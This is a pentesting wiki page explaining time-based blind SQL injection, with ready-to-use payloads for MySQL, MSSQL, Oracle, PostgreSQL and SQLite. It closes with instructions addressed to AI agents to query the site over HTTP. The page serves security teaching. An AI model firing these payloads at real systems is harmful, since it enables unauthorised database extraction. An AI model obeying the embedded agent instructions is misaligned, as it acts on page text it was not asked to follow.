# Time Based ## Theory Time-based SQL injection is a technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. ## Practice The process is relatively the same as [Boolean Based](/web-pentesting/web-vulnerabilities/server-side/sql-injection/blind-sqli/boolean-based.md) injection. All you have to do is modify the payloads to force the database to wait. {% tabs %} {% tab title="MySQL" %} A time-based SQLi payload in MySQL will look like this ```bash 1'; SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')-- - ``` Examples: ```bash #Boolean Based 1' AND (SELECT LENGTH(database()))=1-- - #Time Based 1'; SELECT IF((SELECT LENGTH(database()))=1,SLEEP(10),'a')-- - ``` {% endtab %} {% tab title="MSSQL" %} A time-based SQLi payload in MSSQL will look like this ```bash 1' IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'-- ``` Examples: ```bash #Boolean Based 1' AND (SELECT LEN(DB_NAME()))=1-- #Time Based 1' IF ((SELECT LEN(DB_NAME()))=1) WAITFOR DELAY '0:0:10'-- ``` {% endtab %} {% tab title="OracleSQL" %} A time-based SQLi payload in OracleSQL will look like this ```bash 1' || (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||-- ``` Examples: ```bash #Boolean Based 1' AND (SELECT LENGTH(global_name) FROM global_name)=1-- #Time Based 1' || (SELECT CASE WHEN ((SELECT LENGTH(global_name) FROM global_name)=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||-- ``` {% endtab %} {% tab title="PostgreSQL" %} A time-based SQLi payload in PostgreSQL will look like this ```bash 1'; SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END-- ``` Examples: ```bash #Boolean Based 1' AND (SELECT LENGTH(current_database()))=1-- #Time Based 1'; SELECT CASE WHEN ((SELECT LENGTH(current_database()))=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- ``` {% endtab %} {% tab title="SQLite" %} A time-based SQLi payload in SQLite will look like this ```bash 1' AND CASE WHEN (YOUR-CONDITION-HERE) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END-- ``` Examples: ```bash #Boolean Based 1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')-- #Time Based 1' AND CASE WHEN ((SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END-- ``` {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/web-pentesting/web-vulnerabilities/server-side/sql-injection/blind-sqli/time-based.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.